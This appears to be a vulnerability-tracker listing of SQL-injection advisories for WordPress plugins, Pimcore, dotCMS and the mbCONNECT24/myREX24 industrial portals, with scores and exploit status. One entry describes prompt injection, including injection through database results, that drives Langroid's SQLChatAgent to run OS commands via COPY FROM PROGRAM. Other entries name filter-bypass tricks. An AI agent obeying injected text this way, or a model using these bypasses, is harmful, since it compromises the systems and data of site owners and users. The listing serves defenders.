SQL Injection

Time-based blind SQL injection in the Photo Gallery by 10Web WordPress plugin (all versions through 1.8.40) allows authenticated attackers holding contributor-level access or above to exfiltrate sensitive database contents by embedding a crafted shortcode in a post or draft. The `order_by` parameter is passed unsanitized into existing SQL queries, and the injected payload executes when the shortcode is rendered - targeting WordPress databases containing credentials, user PII, and site configuration. No public exploit code or CISA KEV listing has been identified at time of analysis, though the high confidentiality impact and low attack complexity make this a meaningful risk on any site with non-administrative contributors.

Time-based blind SQL injection in the Simply Schedule Appointments WordPress plugin (versions up to and including 1.6.11.8) allows unauthenticated remote attackers to extract sensitive database contents through the 'append_where_sql' parameter on the /appointments/bulk REST endpoint. The endpoint's permission check accepts a public nonce embedded in the booking widget's frontend JavaScript, and a PUT request with a urlencoded body bypasses the plugin's blocklist by preventing PHP from populating the relevant superglobals. No public exploit identified at time of analysis, though Wordfence has documented the technique in detail.

Arbitrary file deletion in the WP Contact Form 7 DB Handler WordPress plugin (versions up to and including 3.0) can be achieved by chaining CSRF, UNION-based SQL injection, and PHP object deserialization. A remote unauthenticated attacker who lures a logged-in administrator to a malicious page can delete arbitrary server files, including wp-config.php, which typically forces the site into a re-installation state and enables full site takeover. No public exploit identified at time of analysis, though Wordfence's detailed write-up effectively documents the exploit chain.

SQL injection in Symfony's PdoAdapter cache component allows any caller who can influence the `$prefix` argument to `AbstractAdapterTrait::clear()` to inject arbitrary SQL into a DELETE statement, potentially deleting unintended rows from the cache table or reshaping query semantics. Affected versions span symfony/cache across four maintained branches: below 5.4.52, 6.x below 6.4.40, 7.x below 7.4.12, and 8.x below 8.0.12. No public exploit has been identified at time of analysis and the CVE is not listed in CISA KEV, but vendor-released patches are available across all affected branches.

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

Unauthenticated SQL injection in Pi.Alert (a WiFi/LAN intruder detection and web-service monitoring tool by leiweibau) lets remote attackers manipulate backend database queries through the public devices.php endpoint. The flaw affects builds from 2024-06-29 up to the 2026-05-07 fix, and the CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms it is trivially reachable over the network with no authentication or user interaction, while the high-confidentiality / no-integrity / no-availability impact (VC:H/VI:N/VA:N) indicates the primary risk is database disclosure. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; no EPSS score was provided in the source data.

SQL injection in uzy-ssm-mall v1.1.0 exposes sensitive database information to unauthenticated remote attackers via unsanitized input passed through the ProductMapper.xml MyBatis mapper and OrderUtil.java components. The vulnerability requires no authentication or user interaction, making it trivially automatable according to the SSVC framework. No public exploit identified at time of analysis, and EPSS sits at 0.04% (12th percentile), indicating low current exploitation pressure despite the permissive attack surface.

Authentication bypass via SQL injection in OpenRapid RapidCMS v1.3.1 allows unauthenticated remote attackers to manipulate the application's authentication logic by injecting crafted SQL payloads into the `name` cookie parameter processed by the `/template/default/menu.php` component. The CVSS 6.5 (AV:N/AC:L/PR:N/UI:N) score reflects trivial remote exploitability with no prior authentication required, though the confidentiality and integrity impacts are rated Low and availability is unaffected. A public researcher writeup is linked in references, suggesting exploit techniques are documented, but no confirmed active exploitation (CISA KEV) has been recorded and EPSS sits at 0.03% (11th percentile), indicating low observed exploitation activity at time of analysis.

PHP object injection in Pimcore (packages pimcore/pimcore and admin-ui-classic-bundle) up to and including version 12.3.6 arises from six code paths calling unserialize() without the allowed_classes restriction on values read from database columns and filesystem files. An attacker who can already write to one of those sources - for example through SQL injection into the tmp_store, sites, or custom_layouts tables, or a file write to the WebDAV delete log - can plant a serialized PHP gadget chain that executes arbitrary code with web-server privileges once the data is deserialized. No public exploit identified at time of analysis (the vendor advisory documents only a conceptual PoC procedure), the CVE is not in CISA KEV, and EPSS is not provided; the issue is fixed in 12.3.7 and rated CVSS 8.0, with the High attack-complexity reflecting its dependence on a separate write primitive and a working gadget chain.

Blind SQL injection in the WordPress plugin Duplicate Page and Post (by Arjun Thakur) through version 2.9.5 lets authenticated low-privilege users inject crafted SQL into a database query, enabling extraction of arbitrary database contents including WordPress user hashes and secrets. The CVSS:3.1 base score is 8.5 with a changed scope, reflecting impact beyond the plugin into the shared WordPress database. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV; it was reported through the Patchstack research program.

Privilege escalation in PostgreSQL Anonymizer (all versions prior to 3.1.0) allows an authenticated database user to gain superuser privileges by embedding malicious SQL code within a column identifier of a user-created table. When a superuser invokes the k-anonymity function against such a table, the injected code executes with superuser-level privileges, yielding full confidentiality, integrity, and availability impact across the database. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though SSVC rates technical impact as total due to the complete privilege escalation outcome.

Blind SQL injection in the RealMag777 "Active Products Tables for WooCommerce" WordPress plugin (all versions up to and including 1.0.9) allows remote unauthenticated attackers to inject SQL into backend database queries and infer sensitive data through boolean or time-based responses. The CVSS 3.1 vector (PR:N/UI:N) indicates exploitation requires no authentication or user interaction, and the changed scope (S:C) reflects that compromise of the WordPress database can affect the entire site beyond the plugin itself. There is no public exploit identified at time of analysis, and no KEV listing or EPSS score was provided.

Unauthenticated blind SQL injection in the RealMag777 TableOn (posts-table-filterable) WordPress plugin through version 1.0.5.1 lets remote attackers inject crafted SQL into backend queries without credentials or user interaction. Because the CVSS scope is marked changed (S:C) with high confidentiality impact, a successful attack can read data beyond the vulnerable component, including the WordPress database. No public exploit is identified at time of analysis, and the EPSS score is very low (0.03%, 9th percentile), indicating no current sign of widespread exploitation despite the 9.3 base score.

Blind SQL injection in the Easy Form Builder WordPress plugin (by hassantafreshi), affecting all versions up to and including 4.0.6, lets remote unauthenticated attackers inject crafted SQL into backend database queries. With a CVSS of 9.3 and a scope-changed vector, a successful attack can read sensitive data across the database and impact availability. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.03%, 9th percentile), indicating no observed mass exploitation yet despite the high severity rating.

Blind SQL injection in the Tainacan WordPress plugin (versions up to and including 1.0.3) lets remote unauthenticated attackers inject crafted SQL into backend database queries. The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates exploitation requires no authentication or user interaction, and the changed scope plus high confidentiality impact drive the 9.3 score. There is no public exploit identified at the time of analysis and the issue is not listed in CISA KEV, but the low attack complexity and unauthenticated reach make it a high-priority patch candidate.

Blind SQL injection in the Stylemix MasterStudy LMS WordPress plugin (all versions through 3.7.29) lets authenticated low-privilege users inject crafted SQL into a backend database query, enabling extraction of arbitrary database contents including user credentials and configuration secrets. The CVSS 8.5 (scope-changed) rating reflects that a successful injection can reach data beyond the plugin's own scope, i.e. the entire shared WordPress database. There is no public exploit identified at time of analysis and EPSS is very low (0.03%, 9th percentile), but the network-reachable, low-complexity nature of the flaw makes it a meaningful risk for sites that grant accounts to students or instructors.

Blind SQL injection in the RealMag777 'Active Products Tables for WooCommerce' WordPress plugin (versions up to and including 1.0.8) lets remote attackers inject SQL commands via an unsanitized parameter to read arbitrary data from the WordPress/WooCommerce database. The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates unauthenticated network exploitation with a changed scope, meaning the injection reaches the backend database beyond the plugin component itself. There is no public exploit identified at time of analysis and no EPSS score was provided, so probability of exploitation cannot be quantified from the available data.

Unauthenticated SQL injection in mbCONNECT24 and the related MB connect line / Helmholz remote-maintenance portals (myREX24V2, myREX24V2.virtual, mymbCONNECT24) version 2.20.0 and earlier lets a remote attacker reach the getAccountData function and inject crafted input into its SQL SELECT statement. Because authentication is not required, an attacker can read arbitrary database contents, resulting in total loss of confidentiality, though integrity and availability are unaffected. There is no public exploit identified at time of analysis and EPSS is very low (0.05%, 15th percentile), so widespread opportunistic exploitation has not yet materialized despite the high CVSS 4.0 base score of 8.7.

SQL injection in the mbCONNECT24 and myREX24V2 industrial remote-access portals (all variants at or below version 2.20.0) lets a low-privileged remote attacker read arbitrary database contents through the user_alarmprofile view, which fails to neutralize special characters in a SQL SELECT statement (CWE-89). Reported to CERT@VDE and tracked as VDE-2026-044/EUVD-2026-32148, the flaw causes total loss of confidentiality but does not affect integrity or availability. There is no public exploit identified at time of analysis, and EPSS scores it at the 11th percentile (0.03%).

SQL injection in the tag view of MB connect line's mbCONNECT24 and myREX24 remote-maintenance platforms (all variants through 2.20.0) lets a remote attacker manipulate a SQL SELECT statement to read arbitrary database contents, yielding a total loss of confidentiality (VC:H, with no integrity or availability impact). The CVSS 4.0 vector requires low privileges (PR:L), yet the description labels the flaw 'unauthenticated' - a discrepancy defenders should resolve against the vendor advisory before scoping risk. No public exploit is identified at time of analysis, EPSS is very low (0.03%, 11th percentile), and CISA's SSVC framework marks current exploitation as none.

SQL injection in the system_tag view of the mbCONNECT24 family of industrial remote-maintenance portals (mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual) versions 0.0.0 through 2.20.0 lets a remote attacker manipulate a SQL SELECT statement and read arbitrary database contents, yielding a total loss of confidentiality (CVSS 4.0 7.1, VC:H). The CVSS vector indicates a low-privileged account is required (PR:L), though the description text describes the flaw as 'unauthenticated' - this discrepancy should be verified with the vendor. There is no public exploit identified at time of analysis, and EPSS is very low (0.03%, 11th percentile), consistent with CISA SSVC scoring exploitation as 'none.'

SQL injection in MB connect line's mbCONNECT24/myREX24V2 industrial remote-maintenance portals (all versions up to and including 2.20.0) lets a low-privileged authenticated user read arbitrary database contents through the 'system view', where special characters are not neutralized inside a SQL SELECT command, yielding a total loss of confidentiality (CVSS 4.0 base 7.1). No public exploit is identified at time of analysis and the issue is not listed in CISA KEV; EPSS is very low at 0.03% (11th percentile), indicating limited near-term mass-exploitation likelihood. The flaw was reported by CERT@VDE and is tracked under advisory VDE-2026-044 and ENISA EUVD-2026-32145. Note the description calls it 'unauthenticated' while the CVSS vector specifies PR:L (low-privileged), a discrepancy that should be resolved with the vendor.

SQL injection in the devices_configuration view of MB connect line / Red Lion mbCONNECT24 and myREX24V2 remote-maintenance platforms (versions up to and including 2.20.0) lets a low-privileged remote user read arbitrary database contents. The CVSS 4.0 vector scores it 7.1 with high confidentiality impact and no integrity or availability impact, while EPSS rates exploitation probability at only 0.03% (11th percentile). No public exploit is identified at time of analysis and the issue is not in CISA KEV.

SQL injection in the dashboard view of MB connect line's remote-maintenance portals (mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual) lets a remote, low-privileged user inject crafted input into a SQL SELECT statement, yielding a total loss of confidentiality of the backend database. All versions up to and including 2.20.0 are affected. There is no public exploit identified at time of analysis and EPSS is very low (0.03%, 11th percentile), but the network-reachable, low-complexity nature of the flaw in internet-facing OT remote-access gateways warrants prompt remediation.

SQL injection in the alarming view of MB connect line's remote-maintenance platforms - mbCONNECT24, mymbCONNECT24, and the myREX24V2/myREX24V2.virtual portals up to and including version 2.20.0 - lets a remote, low-privileged user smuggle crafted input into a SQL SELECT statement and read arbitrary database contents, resulting in total loss of confidentiality. The CVSS 4.0 vector (PR:L) indicates a low-privileged account is required, even though the advisory text calls the flaw 'unauthenticated' - a discrepancy worth verifying. No public exploit identified at time of analysis, and EPSS is very low (0.03%, 11th percentile), so this is a credible but not actively exploited issue.

SQL injection in MB connect line's remote-maintenance portals — mbCONNECT24, mymbCONNECT24, and the myREX24V2 / myREX24V2.virtual cloud variants (all versions up to and including 2.20.0) — lets a low-privileged remote attacker manipulate a SQL SELECT statement in the getWidgetTags function and read arbitrary database contents, causing a total loss of confidentiality. The flaw is confidentiality-only (no integrity or availability impact) and carries a CVSS 4.0 base score of 7.1. EPSS is very low (0.03%, 11th percentile) and CISA's SSVC framework rates exploitation as 'none'; there is no public exploit identified at time of analysis and it is not on CISA KEV.

SQL injection in the getProjectTags function of MB connect line's remote-maintenance platforms - mbCONNECT24, myREX24V2, mymbCONNECT24 and the myREX24V2.virtual appliance, all versions up to and including 2.20.0 - lets a remote attacker manipulate a backend SQL SELECT statement and read arbitrary database contents, causing a total loss of confidentiality (CVSS 4.0 base 7.1, VC:H with no integrity or availability impact). The flaw was coordinated through CERT@VDE and catalogued in the ENISA EUVD; there is no public exploit identified at time of analysis and the EPSS probability is very low (0.03%, 11th percentile). Note a source conflict on access level: the description calls the attacker 'unauthenticated' while the CVSS vector specifies PR:L (low-privilege authenticated).

SQL injection in the VerifyCreateLicences function of MB connect line's mbCONNECT24 / myREX24 remote-maintenance platforms (including the myREX24V2.virtual and mymbCONNECT24 variants, versions up to and including 2.20.0) lets a remote attacker holding a low-privilege account inject crafted input into a SQL SELECT statement and read arbitrary database contents, causing total loss of confidentiality. The CVSS 4.0 base score is 7.1 with high confidentiality impact but no integrity or availability impact. There is no public exploit identified at time of analysis, and EPSS rates exploitation probability very low at 0.03% (11th percentile).

SQL injection in the getComponentScalings function of MB connect line's mbCONNECT24/myREX24V2 remote-maintenance platforms (all variants at version 2.20.0 and earlier) lets a remote attacker manipulate a backend SQL SELECT statement to read arbitrary database contents, causing a total loss of confidentiality. The flaw was reported by CERT@VDE (advisory VDE-2026-044, EUVD-2026-32138) and the CVSS 4.0 vector indicates the attacker holds at least a low-privilege account (PR:L), although the description text confusingly also calls it 'unauthenticated.' No public exploit identified at time of analysis, and EPSS is very low at 0.03% (11th percentile), indicating no observed mass-exploitation interest.

SQL injection in the mbCONNECT24 industrial remote-access platform (and the sibling products myREX24V2, myREX24V2.virtual and mymbCONNECT24, all versions up to and including 2.20.0) lets a remote attacker abuse the getDeviceScalings function, where user input is concatenated into a SQL SELECT statement without proper neutralization (CWE-89). Successful injection yields a total loss of confidentiality, allowing extraction of arbitrary database contents, though integrity and availability are unaffected per the CVSS 4.0 vector (VC:H/VI:N/VA:N, score 7.1). There is no public exploit identified at time of analysis, and EPSS is very low at 0.03% (11th percentile).

Confidential data disclosure via SQL injection affects the mbCONNECT24 industrial remote-maintenance platform and its related variants (mymbCONNECT24, myREX24V2, myREX24V2.virtual) at versions up to and including 2.20.0. The flaw lives in the getProjectScalings function, where attacker-controlled input reaches a SQL SELECT statement, allowing extraction of arbitrary database contents and a total loss of confidentiality (CVSS 4.0 base 7.1, VC:H). The CVSS vector requires low-privilege access (PR:L), which conflicts with the description's claim of an 'unauthenticated' attack - a discrepancy defenders should resolve against the vendor advisory. There is no public exploit identified at time of analysis, and EPSS is very low (0.03%, 11th percentile), with CISA SSVC rating exploitation as 'none'.

SQL injection in MB connect line's remote-maintenance platforms - mbCONNECT24, myREX24V2, myREX24V2.virtual and mymbCONNECT24 at versions up to and including 2.20.0 - lets a low-privileged remote attacker manipulate the SQL DELETE command in the 'inmessage' model to read the entire backend database and delete rows from a non-critical table. The flaw yields full confidentiality loss and partial integrity loss but no availability impact, and is rated CVSS 4.0 7.1. EPSS is very low (0.03%, 11th percentile), there is no public exploit identified at time of analysis, and it is not on CISA KEV.

SQL injection in the MB connect line mbCONNECT24 / myREX24 family of industrial remote-maintenance gateways (all listed editions through 2.20.0) lets a low-privileged remote user feed crafted input into a SQL SELECT statement assembled by the saveObjectFromData function, exposing the full backend database for reading. Reported by CERT@VDE (advisory VDE-2026-044, EUVD-2026-32134), the issue is a confidentiality-only impact (CVSS 4.0 base 7.1, VC:H/VI:N/VA:N). No public exploit code and no CISA KEV listing exist at this time, and EPSS is very low (0.03%, 11th percentile), indicating no observed mass exploitation.

SQL injection in the saveDashboardLayout function of dash_layout.php in MB connect line's mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual remote-access platforms (all versions up to and including 2.20.0) lets a low-privileged remote attacker manipulate a SQL INSERT statement to read the entire backend database and write rows into a non-critical table. The flaw, reported by CERT@VDE (VDE-2026-044, EUVD-2026-32133), yields total loss of confidentiality and partial loss of integrity but no availability impact. EPSS is very low (0.03%, 11th percentile) and there is no public exploit identified at time of analysis, so this is a serious data-exposure bug rather than a mass-exploitation threat.

SQL injection in the saveDashboardLayout function of dash.php affects the mbCONNECT24, myREX24V2, mymbCONNECT24, and myREX24V2.virtual industrial remote-maintenance platforms in versions up to and including 2.20.0. Because user-supplied input is improperly neutralized inside a SQL INSERT statement, a remote attacker can read the entire backend database and write rows into a non-critical table, yielding full loss of confidentiality and partial loss of integrity. There is no public exploit identified at time of analysis and EPSS exploitation probability is very low (0.03%, 11th percentile).

SQL injection in the getDevicegroups function of MB connect line / Red Lion industrial remote-access products (mbCONNECT24, myREX24V2 and their hosted mymbCONNECT24 / myREX24V2.virtual variants, all versions up to and including 2.20.0) lets a low-privileged remote user inject crafted input into a SQL SELECT statement and read arbitrary database contents, yielding a total loss of confidentiality (CVSS 4.0 base 7.1, VC:H, VI:N, VA:N). The issue was reported by CERT@VDE and published as advisory VDE-2026-044 / EUVD-2026-32161; no public exploit has been identified and EPSS is very low (0.03%, 11th percentile), indicating no observed widespread exploitation. Note a source discrepancy: the description labels the flaw 'unauthenticated' while the CVSS vector requires low privileges (PR:L) - this should be verified with the vendor.

Information disclosure via SQL injection affects the Easy View feature of MB connect line's remote-maintenance portals (mbCONNECT24, mymbCONNECT24, myREX24V2, and myREX24V2.virtual) in versions up to and including 2.20.0. A remote attacker holding a low-privileged account can inject crafted input into a SQL SELECT statement to read arbitrary database contents, resulting in total loss of confidentiality. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.03%, 11th percentile), indicating no observed widespread exploitation activity.

SQL injection in the UpdateParam function of admin.mbnetj.php in MB connect line's mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual remote-maintenance portals (versions up to and including 2.20.0) lets a high-privileged remote attacker tamper with a SQL UPDATE command, reading the entire database and modifying values in a non-critical table. The flaw was reported by CERT@VDE (advisory VDE-2026-044) and carries CVSS 4.0 base 7.0. There is no public exploit identified at time of analysis, EPSS is very low (0.03%, 10th percentile), and CISA SSVC rates exploitation as 'none' - indicating low immediate real-world urgency despite the high impact ceiling.

SQL injection in the UpdateParam function of view.html.php affects MB connect line remote-access portals (mbCONNECT24, myREX24V2, mymbCONNECT24, and myREX24V2.virtual) in versions up to and including 2.20.0, letting an attacker inject into a SQL UPDATE statement to read the entire backend database and alter values in a non-critical table. The CVSS 4.0 vector (PR:H) indicates a high-privileged account is required, even though the advisory text labels the flaw 'unauthenticated' - a discrepancy defenders should resolve with the vendor. There is no public exploit identified at time of analysis, EPSS is very low (0.03%), and CISA SSVC rates exploitation as 'none'.

SQL injection in the DeleteSysLogEntry function of MB connect line / Helmholz remote-maintenance platforms - mbCONNECT24, myREX24V2, mymbCONNECT24 and the myREX24V2.virtual variant through version 2.20.0 - lets a network attacker with high privileges inject SQL into a DELETE statement, reading the entire backend database and deleting rows in a non-critical syslog table. The flaw yields full confidentiality loss and limited integrity impact (CVSS 4.0 base 7.0). There is no public exploit identified at time of analysis, EPSS is very low (0.03%, 10th percentile), and CISA SSVC rates exploitation as none, indicating no observed in-the-wild activity. Note the vendor description's 'unauthenticated' wording conflicts with the CVSS PR:H (high privileges required) metric.

SQL injection in the MB connect line remote-maintenance portals mbCONNECT24, myREX24V2, myREX24V2.virtual and mymbCONNECT24 (all versions up to and including 2.20.0) lets a high-privileged remote user manipulate a SQL DELETE statement in the _RemoveRequest function to read the entire backend database and delete rows in a non-critical table. The CVSS 4.0 vector (PR:H) indicates an authenticated, high-privilege account is required despite the description's wording, yielding total confidentiality loss and partial integrity loss. There is no public exploit identified at time of analysis, EPSS is very low (0.03%), and the issue is not listed in CISA KEV.

Arbitrary file disclosure in Synology Active Backup for Business (DSM add-on package, versions before 2.7.1-3234) lets unauthenticated remote attackers read sensitive files on the host via a SQL injection flaw (CWE-89). The vulnerability scores CVSS 8.6 with a changed scope and high confidentiality impact, but EPSS estimates only a 0.04% (14th percentile) exploitation probability, and there is no public exploit identified at time of analysis nor any CISA KEV listing. Synology, who self-reported the issue, has released a fixed package.

Time-based blind SQL Injection in the EnvíaloSimple: Email Marketing y Newsletters WordPress plugin (all versions through 2.4.5) allows authenticated administrators to extract sensitive data from the underlying database. The vulnerability is in the 'orderby' parameter, which is insufficiently escaped and passed into existing SQL queries without adequate preparation, enabling an attacker with administrator-level WordPress credentials to append arbitrary SQL and enumerate database contents. EPSS is very low (0.03%, 8th percentile), no public exploit has been identified, and the vulnerability is not listed in CISA KEV, suggesting limited real-world exploitation pressure at this time.

SQL injection in the dsgvo_contracts view of mbCONNECT24 and related industrial remote access platforms (versions up to and including 2.20.0) enables a high-privileged remote attacker to exfiltrate confidential data from the underlying database without integrity or availability impact. The vulnerability (CWE-89, CVSS 4.0: 6.9) is constrained by the PR:H requirement - the attacker must already hold high-privileged credentials - which substantially limits realistic attack surface in well-managed deployments. No public exploit or active exploitation has been identified; CISA SSVC rates exploitation as none and EPSS stands at 0.03% (10th percentile).

SQL injection in MB connect line's mbCONNECT24 / myREX24V2 remote-maintenance portals (all releases up to and including 2.20.0) lets an attacker break out of the SQL UPDATE statement bound to the 'devices' parameter in the accountstatus view, yielding full read access to the backend database and limited writes to a non-critical table. The CVSS 4.0 vector requires high privileges (PR:H), so a privileged authenticated user is the realistic threat actor — this directly contradicts the advisory text that labels the flaw 'unauthenticated,' a discrepancy defenders should resolve with the vendor. EPSS is very low (0.03%, 10th percentile) and there is no CISA KEV entry; no public exploit identified at time of analysis.

SQL injection in the mbCONNECT24 / myREX24V2 industrial remote-access platform (all editions through 2.20.0) lets a high-privileged remote attacker inject SQL through the userid parameter of the accountstatus view, which is concatenated unsafely into a SQL UPDATE statement. Successful exploitation yields read access to the entire backend database (total confidentiality loss) plus the ability to alter values in a non-critical table (partial integrity loss). There is no public exploit identified at time of analysis, it is not listed in CISA KEV, and the EPSS probability is very low at 0.03% (10th percentile).

SQL injection in the DevSerialReset function of MB connect line / Helmholz industrial remote-access portals (mbCONNECT24, mymbCONNECT24, myREX24V2, and the .virtual variants) lets a high-privileged remote attacker read the entire backend database and modify values in a non-critical table. The flaw stems from improper neutralization of special elements within a SQL UPDATE statement (CWE-89), yielding total loss of confidentiality and partial integrity impact. There is no public exploit identified at time of analysis, and EPSS rates exploitation likelihood very low (0.03%, 10th percentile).

SQL injection in the DevSerialReset function of MB Connect Line's mbCONNECT24, myREX24V2, mymbCONNECT24, and myREX24V2.virtual industrial remote access platforms allows a high-privileged remote attacker to read arbitrary database contents via a maliciously crafted SQL SELECT statement. All product variants at or below version 2.20.0 are confirmed affected per ENISA EUVD-2026-32126. No public exploit code exists and EPSS is 0.03% (10th percentile), indicating low observed exploitation pressure at time of analysis; however, the industrial/OT targeting profile warrants attention.

SQL injection in the getAccountByID function of MB connect line's mbCONNECT24, mymbCONNECT24, myREX24V2, and myREX24V2.virtual industrial remote-access platforms (all versions up to and including 2.20.0) allows a high-privileged remote attacker to extract data from the underlying database via a crafted SELECT statement. The vulnerability is classified under CWE-89 with confidentiality impact rated High on the vulnerable component, while integrity and availability remain unaffected. No public exploit code exists and no KEV listing has been issued; EPSS (0.03%, 10th percentile) and SSVC signals both indicate low current exploitation likelihood.

Unauthenticated SQL injection in the mbCONNECT24 remote-maintenance platform (and the related myREX24V2, myREX24V2.virtual, and mymbCONNECT24 portals) at version 2.20.0 and earlier lets a remote attacker inject crafted SQL into a SELECT statement processed by the 'sync_data24' task, yielding a total loss of database confidentiality (CVSS 4.0 base 8.7). Because the CVSS vector confirms no privileges and no user interaction (PR:N/UI:N), any network-reachable client can attempt it. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.05%, 15th percentile), so widespread automated exploitation is not currently indicated.

Unauthenticated SQL injection in the mbCONNECT24 remote-maintenance portal (and the related myREX24V2, myREX24V2.virtual and mymbCONNECT24 products, all versions up to and including 2.20.0) lets a remote attacker read arbitrary data from the backend database by abusing the _mb24confi_getDevice function. The flaw requires no credentials, no user interaction and low attack complexity over the network (CVSS 4.0 score 8.7), but its impact is confined to confidentiality. There is no public exploit identified at time of analysis and the EPSS probability is very low (0.05%, 15th percentile), indicating no observed exploitation activity yet.

SQL injection in the mbCONNECT24 / myREX24V2 family of industrial remote-maintenance platforms (all editions at version 2.20.0 and earlier) lets unauthenticated remote attackers manipulate a SQL SELECT statement in the getAlarmProfiles function and read arbitrary database contents. The flaw (CWE-89) carries a CVSS 4.0 base score of 8.7 with a confidentiality-only impact and requires no authentication or user interaction. There is no public exploit identified at time of analysis, and the EPSS probability is very low (0.05%, 15th percentile), indicating no observed mass-exploitation pressure despite the high base score.

SQL injection in MB connect line's mbCONNECT24, mymbCONNECT24, and myREX24V2 remote-maintenance portals (all versions up to and including 2.20.0) lets an unauthenticated remote attacker inject crafted SQL through the _mb24confi_getTagAlarm function in mb24alarm.php, resulting in a total loss of database confidentiality. The CVSS 4.0 base score of 8.7 reflects network reach with no authentication or user interaction (AV:N/AC:L/PR:N/UI:N), but impact is scoped to confidentiality only (VC:H, VI:N, VA:N) - an attacker can read data but cannot directly alter or disrupt the system through this flaw. No public exploit identified at time of analysis, and the EPSS score is very low (0.05%, 15th percentile), indicating no observed broad exploitation activity despite the high base score.

Unauthenticated SQL injection in the mbCONNECT24/myREX24 industrial remote-maintenance platform (all variants up to and including 2.20.0) lets remote attackers extract database contents through the _mb24api_getUserAccount API function via a crafted SQL SELECT command (CWE-89). The CVSS 4.0 score of 8.7 reflects a confidentiality-only impact (VC:H, VI:N, VA:N) reachable over the network with no authentication and no user interaction. No public exploit has been identified at time of analysis and EPSS rates exploitation probability very low (0.05%, 15th percentile), but the no-auth, network-reachable design makes credential and account-data theft a credible concern.

SQL injection in MB connect line's mbCONNECT24 remote-maintenance platform (and the related myREX24V2, mymbCONNECT24 and myREX24V2.virtual products through version 2.20.0) lets unauthenticated remote attackers read arbitrary database contents. The flaw lives in the _mb24confi_getTagAlarm function of dataapi.php, where attacker-controlled input is concatenated into a SQL SELECT statement, yielding a total loss of confidentiality. There is no public exploit identified at time of analysis, the EPSS probability is very low (0.05%), and the issue is not on CISA KEV; it was reported by CERT@VDE (advisory VDE-2026-044).

SQL injection in the mbCONNECT24 / myREX24V2 industrial remote-maintenance platforms (versions up to and including 2.20.0) lets a remote, unauthenticated attacker read arbitrary database contents by manipulating the tagid parameter of the getLiveValues function. The CVSS 4.0 base score is 8.7 with a confidentiality-only impact (VC:H, VI:N, VA:N), and no public exploit has been identified at the time of analysis. EPSS is very low (0.05%, 15th percentile), and the issue is not in CISA KEV, so widespread automated exploitation is not currently indicated despite the network-reachable, no-auth attack surface.

Unauthenticated SQL injection in MB connect line's mbCONNECT24 and myREX24V2 industrial remote-maintenance portals (all editions through 2.20.0) lets remote attackers inject SQL through the 'sn' parameter of the getLiveValues function, producing a total loss of confidentiality. Disclosed via CERT@VDE advisory VDE-2026-044 and tracked as EUVD-2026-32112, the flaw carries a CVSS 4.0 base score of 8.7 and requires no authentication or user interaction, though it has no integrity or availability impact. No public exploit is identified at time of analysis and EPSS rates near-term exploitation probability low at 0.05% (15th percentile).

Unauthenticated SQL injection in the mbCONNECT24 / myREX24V2 industrial remote-maintenance platforms (all variants at versions ≤2.20.0) lets a remote attacker inject crafted input into a SQL SELECT statement handled by the ssoabstractservice (single sign-on) component, yielding read access to backend database contents and a total loss of confidentiality. The flaw requires no authentication, no privileges, and no user interaction over the network. No public exploit has been identified at time of analysis, and the EPSS score is very low (0.05%, 15th percentile), but the issue affects internet-exposed OT remote-access portals, raising its practical exposure.

SQL injection in the MB connect line / Red Lion remote-maintenance platform (mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual, all versions up to and including 2.20.0) lets a remote, unauthenticated attacker inject crafted SQL into the userinfo endpoint, resulting in total loss of confidentiality of the backing database. The flaw was reported by CERT@VDE (advisory VDE-2026-044) and tracked in the ENISA EUVD as EUVD-2026-32110. There is no public exploit identified at time of analysis and EPSS is very low (0.05%), but the CVSS 4.0 base score is 8.7 and CISA's SSVC framework rates the issue as automatable.

SQL injection in dotCMS Core (versions 25.11.04-1 through 26.04.28-02) lets remote unauthenticated attackers read, modify, or destroy arbitrary database content through the Publish Audit API endpoints /api/auditPublishing/get and /api/auditPublishing/getAll, which neither enforced authentication nor sanitized input before constructing SQL. The flaw carries a maximum CVSS 4.0 base score of 10.0, reflecting full confidentiality, integrity, and availability impact extending to subsequent systems. No public exploit was identified at time of analysis and EPSS is low (0.38%, 60th percentile), but the network-reachable, no-privilege, no-interaction profile makes this an urgent patch for affected (non-LTS) deployments.

SQL injection in Pimcore's admin-ui-classic-bundle (versions <= 2.3.5) allows an authenticated user holding only the translations-view permission to read arbitrary database contents by injecting into the translation grid's date filter. The user-controlled 'property' field of the filter JSON is interpolated directly into a UNIX_TIMESTAMP(DATE(FROM_UNIXTIME(...))) expression at the POST /admin/translation/translations endpoint, behind only a trivially bypassable str_replace('--','') filter. A working proof-of-concept and publicly available exploit code exist; the reporter notes it can be chained with an unsafe-unserialize flaw (GM-249) to reach remote code execution. No EPSS score or CISA KEV listing was supplied.

SQL injection in Pimcore's CustomReportsBundle (versions ≤ 12.3.5) lets an authenticated user holding the reports_config permission inject arbitrary SQL through the custom-report column-config endpoint, which concatenates user-supplied 'sql', 'from', and 'where' fields directly into a query executed via Doctrine's fetchAssociative(). Because the controller returns raw database error messages in its JSON response, attackers can perform error-based extraction (e.g. EXTRACTVALUE) to read credentials and arbitrary tables, and can bypass the keyword denylist using inline /**/ comments to reach UPDATE/INSERT/DELETE - compromising confidentiality and integrity. Publicly available exploit code exists (a full PoC is published in the GitHub advisory); no CISA KEV listing or EPSS score is present in the provided data.

